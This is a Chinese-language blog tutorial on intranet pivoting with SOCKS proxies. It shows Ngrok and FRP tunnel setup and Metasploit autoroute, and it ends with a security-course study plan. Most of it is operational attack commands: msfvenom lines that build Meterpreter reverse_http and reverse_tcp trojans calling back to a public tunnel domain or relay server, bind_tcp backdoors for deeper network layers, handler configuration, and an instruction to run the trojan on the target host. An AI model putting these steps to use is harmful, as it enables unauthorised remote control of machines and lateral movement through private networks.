当前位置:   article > 正文

内网安全:Socks 代理 -- 本地代理 技术._本地代理服务器

本地代理服务器

内网安全:Socks 代理 || 本地代理 技术.

Socks

代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4
和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.


目录:

内网安全:Socks 代理 技术.

两个内网通讯上线( Ngrok )

(1)开通隧道:

(2)下载客户端:

(3)生成一个程序后门:

(4)进行监听:(kali)

两个内网通讯上线( Frp 自建跳板 )

(1)跳板环境搭建:

(2)生成程序后面:

(3)进行监听:(kali)

本地代理:( MSF 跳板多个内网主机系列)

第二层内网代理:

(1)信息收集及配置访问:

(2)开启本地代理:

(3)内网扫描:

(4)浏览器访问:

第三层内网代理:

(1)生成正向程序后门:

(2)进行监听:

(3)信息收集及配置访问:

(4)开启本地代理:

第四层内网渗透:

(1)生成正向程序后门:

(2)进行监听:


代理解决的问题:(1)内网有外网    (2)内网有过滤    (3)内网无外网
  • 1

两个内网通讯上线( Ngrok )

开通隧道工具:https://www.ngrok.cc/user.html


理解:二个内网主机不能相互连接的,这样就可以通过开通的隧道进行连接.
(开通的隧道就是在外网开通一个域名:当目标访问这个域名,则会将数据返还回来到kali中)
  • 1
  • 2
  • 3
  • 4
  • 5
(1)开通隧道:


(2)下载客户端:

解压放到 kali 中:(切换的刚刚下载的文件目录中)

(1)./sunny clientid 115735315695        // 执行 

    ./sunny clientid 隧道的IP
  • 1
  • 2
  • 3
  • 4
  • 5


(3)生成一个程序后门:(木马)
msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe
  • 1


(4)进行监听:(kali)
(1)msfconsole

(2)use exploit/multi/handler

(3)set payload windows/meterpreter/reverse_http

(4)set lhost 192.168.0.106        // 本地的 IP 地址

(5)set lport 4444                 // 本地的 端口.

(6)exploit
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11


两个内网通讯上线( Frp 自建跳板 )

(1)跳板环境 搭建:
需要有自己的服务器,有来搭建跳板.


【服务器 和 控制端】需要下载的工具:https://github.com/fatedier/frp/releases
  • 1
  • 2
  • 3
  • 4

服务器修改配置文件 frps.ini:
[common]
bind_port = 6677            // 这个端口修改为 服务器 开放的就行

启动服务端:【切换在下载的目录并执行】
./frps -c ./frps.ini


控制端修改配置文件 frpc.ini:
[common]
server_addr = 云主机 IP 地址
server_port = 6677                 // frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555                  // 转发给本机的 5555
remote_port = 6000                 // 服务端用 6000 端口转发给本机

启动客户端:【切换在下载的目录并执行】
./frpc -c ./frpc.ini
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20

(2)生成程序后面:(木马)
msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器(公网)的IP地址 lport=6000 -f exe -o frp.exe
  • 1

(3)进行监听:(kali)
(1)msfconsole

(2)use exploit/multi/handler

(3)set payload windows/meterpreter/reverse_tcp

(4)set LHOST 127.0.0.1    

(5)set LPORT 5555        // 本机监听的端口【和控制端的一样】

(6)exploit

然后把程序后门(木马)放在目标主机上执行就行.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13

本地代理:( MSF 跳板多个内网主机系列)

第二层内网代理:

(1)信息收集及配置访问:
(1)run get_local_subnets            // 获取网络接口

(2)run autoroute -p                 // 查看路由地址

(3)run autoroute -s 10.0.20.0/24    // 添加地二层内网的路由网段.

或

(3)run post/multi/manage/autoroute        // 自动添加,目前所有路由网段
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9


(2)开启本地代理:
background                            // 挂起会话

如果是msf6,使用代理模板为:

use auxiliary/server/socks_proxy

如果是msf5,使用代理模板为:

use auxiliary/server/socks4a


(1)set srvport 2222        // 设置本地代理端口为2222

(2)exploit                 // 运行
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14


(3)内网扫描:
打开 /etc/proxychains4.conf 文件:

socks4 192.168.0.106 2222                // 添加 本地的代理和端口
  • 1
  • 2
  • 3

进行扫描:

proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80 

-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护.

-sT:扫描 TCP 数据包已建立的连接 connect
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7


(4)浏览器访问:


第三层内网代理:

(1)生成正向程序后门:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe
  • 1


(2)进行监听:
要在和上面一样的 msf 会话中执行.

(1)use exploit/multi/handler    

(2)set payload windows/x64/meterpreter/bind_tcp

(3)set rhost 10.0.20.99                // 第二层内网的 IP 地址

(4)set lport 54321                     // 和程序后面(木马)一样的端口

(5)exploit
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11


(3)信息收集及配置访问:
(1)run get_local_subnets            // 获取网络接口

(2)run autoroute -p                 // 查看路由地址

(3)run post/multi/manage/autoroute        // 自动添加,目前所有路由网段.
  • 1
  • 2
  • 3
  • 4
  • 5


(4)开启本地代理:
background                            // 挂起会话

如果是msf6,使用代理模板为:

use auxiliary/server/socks_proxy

如果是msf5,使用代理模板为:

use auxiliary/server/socks4a
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9

(1)set srvport 6666        // 默认端口6666

(2)exploit                 // 运行
  • 1
  • 2
  • 3


第四层内网渗透:

(1)生成正向程序后门:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe
  • 1


(2)进行监听:
要在和上面一样的 msf 会话中执行.

(1)use exploit/multi/handler    

(2)set payload windows/x64/meterpreter/bind_tcp

(3)set rhost 10.0.10.110                // 第二层内网的 IP 地址

(4)set lport 9876                     // 和程序后面(木马)一样的端口

(5)exploit
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

学习链接:第70天:内网安全-
域横向内网漫游Socks代理隧道技术_哔哩哔哩_bilibili

接下来我将给各位同学划分一张学习计划表!

学习计划

那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:

阶段一:初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?

阶段二:中级or高级网络安全工程师(看自己能力)

综合薪资区间15k~30k

7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。

零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;

Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三:顶级网络安全工程师

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/码创造者/article/detail/931059
推荐阅读
相关标签